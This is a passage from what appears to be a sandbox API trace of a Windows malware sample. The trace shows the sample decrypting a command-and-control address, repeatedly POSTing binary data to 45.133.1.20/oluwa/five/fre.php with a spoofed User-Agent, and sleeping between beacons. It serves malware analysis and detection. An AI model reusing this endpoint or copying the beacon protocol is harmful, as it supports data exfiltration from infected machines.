pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0280.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.114] CryptDestroyKey (hKey=0x6ad020) returned 1 [0280.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.115] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0280.115] GetProcessHeap () returned 0x6a0000 [0280.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0280.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.117] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0280.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.118] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0280.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.119] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0280.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.120] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0280.121] GetProcessHeap () returned 0x6a0000 [0280.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0280.121] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0280.121] GetProcessHeap () returned 0x6a0000 [0280.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0280.123] GetProcessHeap () returned 0x6a0000 [0280.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0280.123] GetProcessHeap () returned 0x6a0000 [0280.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0280.123] GetProcessHeap () returned 0x6a0000 [0280.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0280.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.126] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.133] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0280.140] GetProcessHeap () returned 0x6a0000 [0280.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0280.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.142] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0280.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.143] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.210] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.210] GetProcessHeap () returned 0x6a0000 [0280.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0280.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.212] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0280.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.213] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0280.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.214] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0280.214] GetProcessHeap () returned 0x6a0000 [0280.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0280.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.215] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0280.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.216] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0280.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.217] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0280.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.218] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0280.218] GetProcessHeap () returned 0x6a0000 [0280.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0280.219] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0280.219] GetProcessHeap () returned 0x6a0000 [0280.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0280.219] socket (af=2, type=1, protocol=6) returned 0xa28 [0280.219] connect (s=0xa28, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0280.244] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0280.244] GetProcessHeap () returned 0x6a0000 [0280.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0280.244] GetProcessHeap () returned 0x6a0000 [0280.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0280.245] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0280.246] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0280.246] GetProcessHeap () returned 0x6a0000 [0280.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba830 [0280.246] GetProcessHeap () returned 0x6a0000 [0280.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0280.247] GetProcessHeap () returned 0x6a0000 [0280.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0280.247] GetProcessHeap () returned 0x6a0000 [0280.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0280.248] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0280.249] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0280.249] GetProcessHeap () returned 0x6a0000 [0280.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0280.249] GetProcessHeap () returned 0x6a0000 [0280.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0280.250] send (s=0xa28, buf=0x6bd460*, len=242, flags=0) returned 242 [0280.250] send (s=0xa28, buf=0x6bb998*, len=159, flags=0) returned 159 [0280.250] GetProcessHeap () returned 0x6a0000 [0280.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0280.250] recv (in: s=0xa28, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0280.323] GetProcessHeap () returned 0x6a0000 [0280.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0280.325] GetProcessHeap () returned 0x6a0000 [0280.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0280.325] GetProcessHeap () returned 0x6a0000 [0280.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba830 | out: hHeap=0x6a0000) returned 1 [0280.325] GetProcessHeap () returned 0x6a0000 [0280.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0280.326] closesocket (s=0xa28) returned 0 [0280.326] GetProcessHeap () returned 0x6a0000 [0280.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0280.326] GetProcessHeap () returned 0x6a0000 [0280.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0280.327] GetProcessHeap () returned 0x6a0000 [0280.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0280.327] GetProcessHeap () returned 0x6a0000 [0280.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0280.327] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17c4) returned 0xa28 [0280.329] Sleep (dwMilliseconds=0xea60) [0280.346] GetProcessHeap () returned 0x6a0000 [0280.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0280.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.357] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0280.368] GetProcessHeap () returned 0x6a0000 [0280.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0280.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.369] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0280.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.370] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.371] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.371] GetProcessHeap () returned 0x6a0000 [0280.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0280.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.372] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0280.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.373] CryptDestroyKey (hKey=0x6ad020) returned 1 [0280.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.374] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0280.374] GetProcessHeap () returned 0x6a0000 [0280.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0280.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.375] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0280.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.376] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0280.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.379] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0280.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.380] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0280.380] GetProcessHeap () returned 0x6a0000 [0280.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0280.380] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0280.380] GetProcessHeap () returned 0x6a0000 [0280.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0280.381] GetProcessHeap () returned 0x6a0000 [0280.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0280.381] GetProcessHeap () returned 0x6a0000 [0280.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0280.381] GetProcessHeap () returned 0x6a0000 [0280.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0280.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.382] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.388] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0280.396] GetProcessHeap () returned 0x6a0000 [0280.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0280.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.397] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0280.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.400] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.402] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.402] GetProcessHeap () returned 0x6a0000 [0280.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0280.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.403] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0280.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.420] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0280.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.424] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0280.424] GetProcessHeap () returned 0x6a0000 [0280.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0280.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.425] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0280.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.426] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0280.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.427] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0280.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.428] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0280.428] GetProcessHeap () returned 0x6a0000 [0280.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0280.428] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0280.428] GetProcessHeap () returned 0x6a0000 [0280.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0280.428] socket (af=2, type=1, protocol=6) returned 0xa2c [0280.428] connect (s=0xa2c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0280.456] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0280.456] GetProcessHeap () returned 0x6a0000 [0280.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0280.456] GetProcessHeap () returned 0x6a0000 [0280.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0280.457] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0280.458] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0280.458] GetProcessHeap () returned 0x6a0000 [0280.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9b70 [0280.458] GetProcessHeap () returned 0x6a0000 [0280.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0280.459] GetProcessHeap () returned 0x6a0000 [0280.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0280.459] GetProcessHeap () returned 0x6a0000 [0280.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0280.460] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0280.461] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0280.461] GetProcessHeap () returned 0x6a0000 [0280.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0280.461] GetProcessHeap () returned 0x6a0000 [0280.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0280.462] send (s=0xa2c, buf=0x6bd460*, len=242, flags=0) returned 242 [0280.462] send (s=0xa2c, buf=0x6bb998*, len=159, flags=0) returned 159 [0280.462] GetProcessHeap () returned 0x6a0000 [0280.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0280.462] recv (in: s=0xa2c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0280.532] GetProcessHeap () returned 0x6a0000 [0280.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0280.533] GetProcessHeap () returned 0x6a0000 [0280.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0280.533] GetProcessHeap () returned 0x6a0000 [0280.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9b70 | out: hHeap=0x6a0000) returned 1 [0280.536] GetProcessHeap () returned 0x6a0000 [0280.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0280.537] closesocket (s=0xa2c) returned 0 [0280.537] GetProcessHeap () returned 0x6a0000 [0280.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0280.537] GetProcessHeap () returned 0x6a0000 [0280.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0280.538] GetProcessHeap () returned 0x6a0000 [0280.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0280.538] GetProcessHeap () returned 0x6a0000 [0280.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0280.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17c8) returned 0xa2c [0280.541] Sleep (dwMilliseconds=0xea60) [0280.543] GetProcessHeap () returned 0x6a0000 [0280.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0280.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.546] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0280.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.554] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0280.565] GetProcessHeap () returned 0x6a0000 [0280.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0280.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.567] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0280.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.568] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0280.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.570] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0280.570] GetProcessHeap () returned 0x6a0000 [0280.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0280.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.572] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0280.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.573] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0280.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0280.575] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0280.575] GetProcessHeap () returned 0x6a0000 [0280.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0280.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.576] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0280.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.580] 